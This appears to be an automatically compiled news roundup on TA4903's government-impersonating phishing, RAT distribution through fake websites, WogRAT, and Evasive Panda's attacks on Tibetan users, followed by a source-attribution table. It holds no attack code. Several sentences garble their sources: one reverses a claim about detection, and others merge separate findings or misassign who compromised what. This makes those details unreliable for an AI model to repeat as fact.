By NewsBlogger A group of hackers known as TA4903 has been impersonating U.S. government entities to conduct business email compromise attacks, while other threat actors have been distributing malware targeting Android and Windows users through fake websites.
At a glance
- TA4903 hackers impersonate U.S. government entities like DOT and USDA.
- They use QR codes in PDF attachments to redirect to phishing sites.
- TA4903 targets organizations globally with high-volume email campaigns.
- Threat actors distribute malware through fake websites targeting Android and Windows users.
- Evasive Panda conducts watering hole and supply chain attacks targeting Tibetan users.
The details
A gang of hackers known as TA4903, specializing in business email compromise (BEC) attacks, has been impersonating U.S. government entities such as the U.S. Department of Transportation, the U.S. Department of Agriculture, and the U.S. Small Business Administration.
The group, active since at least 2019, has intensified its activities since mid-2023 and through 2024. One of their latest tactics involves using QR codes in PDF document attachments, redirecting recipients to phishing sites resembling official portals of U.S. government agencies.
Financial department staff have been tricked into updating payment details under the guise of a cyberattack theme.
TA4903 Targets Organizations Globally
TA4903 targets organizations globally with high-volume email campaigns, particularly in the U.S. They are known to register domain names resembling government entities and private organizations.
Recently, the group has shifted from spoofing U.S. government entities to impersonating small businesses.
The complexity of their BEC attacks presents detection challenges, emphasizing the need for a comprehensive, multi-layered security strategy to mitigate threats.
Threat Actors Utilizing Fake Websites
On the other hand, threat actors have been utilizing fake websites to distribute malware targeting Android and Windows users since December 2023. The malware includes Remote Access Trojans (RATs) like SpyNote RAT for Android and NjRAT and DCRat for Windows.
The spoofed websites, written in Russian, closely resemble legitimate domains to deceive victims.
These websites offer downloads for Android, iOS, and Windows platforms, with the Android download triggering an APK file download and the Windows button initiating a batch script download.
The batch script executes a PowerShell script that downloads and executes the remote access trojan.
A new malware, WogRAT, is targeting Windows and Linux systems using a free online notepad platform.
Since late 2022, WogRAT has targeted Asian countries, collecting system information and supporting commands like executing commands and downloading files.
TA4903, a financially motivated cybercriminal actor, conducts high-volume phishing campaigns to steal corporate credentials by spoofing U.S. government entities and organizations across various sectors.
Attack chains involve QR codes for credential phishing and the EvilProxy phishing kit to bypass 2FA. Once a mailbox is compromised, the threat actor searches for payment, invoice, and bank information, using phishing campaigns to distribute malware families like DarkGate, Agent Tesla, and Remcos RAT.
Evasive Panda has orchestrated watering hole and supply chain attacks targeting Tibetan users since September 2023, delivering malicious downloaders for Windows and macOS and deploying MgBot and Nightdoor backdoors.
Discovered by ESET in January 2024 after compromising at least three websites, Evasive Panda, also known as Bronze Highland and Daggerfly, targeted an NGO in Mainland China in April 2023. Symantec implicated Evasive Panda in a cyber espionage campaign targeting telecom service providers in Africa since November 2022, compromising the Kagyu International Monlam Trust’s website.
Targeting users in India, Taiwan, Hong Kong, Australia, and the U.S., Evasive Panda likely targeted the Tibetan community during the Kagyu Monlam Festival in late January and February 2024, using a malicious downloader named “certificate.exe” on Windows and “certificate.pkg” on macOS.
The Nightdoor implant abused the Google Drive API for command-and-control, infiltrating an Indian software company’s website to distribute trojanized Windows and macOS installers of Tibetan language translation software.
The Tibetan news website Tibetpost hosted malicious payloads, with the trojanized Windows installer triggering a multi-stage attack sequence to drop MgBot or Nightdoor.
These backdoors gather system information, a list of installed apps, and running processes, among other features.
Article X-ray
Sources
Here are all the sources used to create this article:
Facts attribution
This section links each of the article’s facts back to its original source.
If you suspect false information in the article, you can use this section to investigate where it came from.
| bleepingcomputer.com |
|---|
| – A gang of hackers known as TA4903 specializes in business email compromise (BEC) attacks – TA4903 has been impersonating U.S. government entities such as the U.S. Department of Transportation, the U.S. Department of Agriculture, and the U.S. Small Business Administration |
| – The group has been active since at least 2019, intensifying activities since mid-2023 and through 2024 – TA4903 has started using QR codes in PDF document attachments as part of their latest tactic – Recipients scanning the QR codes are redirected to phishing sites resembling official portals of U.S. government agencies |
| – The threat actor has used the theme of a cyberattack to trick financial department staff into updating payment details – TA4903 targets organizations globally with high-volume email campaigns, particularly in the U.S. |
| – The group is known to register domain names resembling government entities and private organizations. – TA4903 has recently shifted from spoofing U.S. government entities to impersonating small businesses – The complexity of their BEC attacks provides opportunities for detection, requiring a comprehensive, multi-layered security strategy to mitigate threats. |
| thehackernews.com |
|---|
| – Threat actors have been using fake websites to distribute malware targeting Android and Windows users since December 2023 |
| – The malware includes Remote Access Trojans (RATs) like SpyNote RAT for Android and NjRAT and DCRat for Windows – The spoofed websites are in Russian and closely resemble legitimate domains to trick victims – The websites offer downloads for Android, iOS, and Windows platforms – Clicking on the Android download button triggers an APK file download, while the Windows button downloads a batch script |
| – The batch script executes a PowerShell script that downloads and executes the remote access trojan. – There is no evidence of iOS users being targeted, as the iOS button redirects to the legitimate Apple App Store listing for Skype – A new malware called WogRAT is targeting Windows and Linux systems using a free online notepad platform – WogRAT has been active since late 2022 and targets Asian countries |
| – The malware collects system information and supports commands like executing commands and downloading files – TA4903 is a financially motivated cybercriminal actor conducting high-volume phishing campaigns to steal corporate credentials – TA4903 spoofs U.S. government entities and organizations in various sectors – Attack chains involve QR codes for credential phishing and the EvilProxy phishing kit to bypass 2FA – Once a mailbox is compromised, the threat actor searches for payment, invoice, and bank information – Phishing campaigns have also been used to distribute malware families like DarkGate, Agent Tesla, and Remcos RAT |
| thehackernews.com |
|---|
| – Evasive Panda orchestrated watering hole and supply chain attacks targeting Tibetan users since September 2023 |
| – The attacks aimed to deliver malicious downloaders for Windows and macOS, deploying MgBot and Nightdoor backdoors – ESET discovered the operation in January 2024 after compromising at least three websites – Evasive Panda, also known as Bronze Highland and Daggerfly, targeted an NGO in Mainland China in April 2023 – Symantec implicated Evasive Panda in a cyber espionage campaign targeting telecom services providers in Africa since November 2022 – |
| – The attacks involved compromising the Kagyu International Monlam Trust’s website – The attackers placed a script on the website to target users in India, Taiwan, Hong Kong, Australia, and the U.S. – Evasive Panda likely targeted the Tibetan community during the Kagyu Monlam Festival in India in late January and February 2024 – The attacks used a malicious downloader named “certificate.exe” on Windows and “certificate.pkg” on macOS – The Nightdoor implant abused the Google Drive API for command-and-control – Evasive Panda infiltrated an Indian software company’s website to distribute trojanized Windows and macOS installers of Tibetan language translation software – The attackers also used the Tibetan news website Tibetpost to host malicious payloads – The trojanized Windows installer triggers a multi-stage attack sequence to drop MgBot or Nightdoor – MgBot and Nightdoor backdoors gather system information, a list of installed apps, and running processes, among other features |
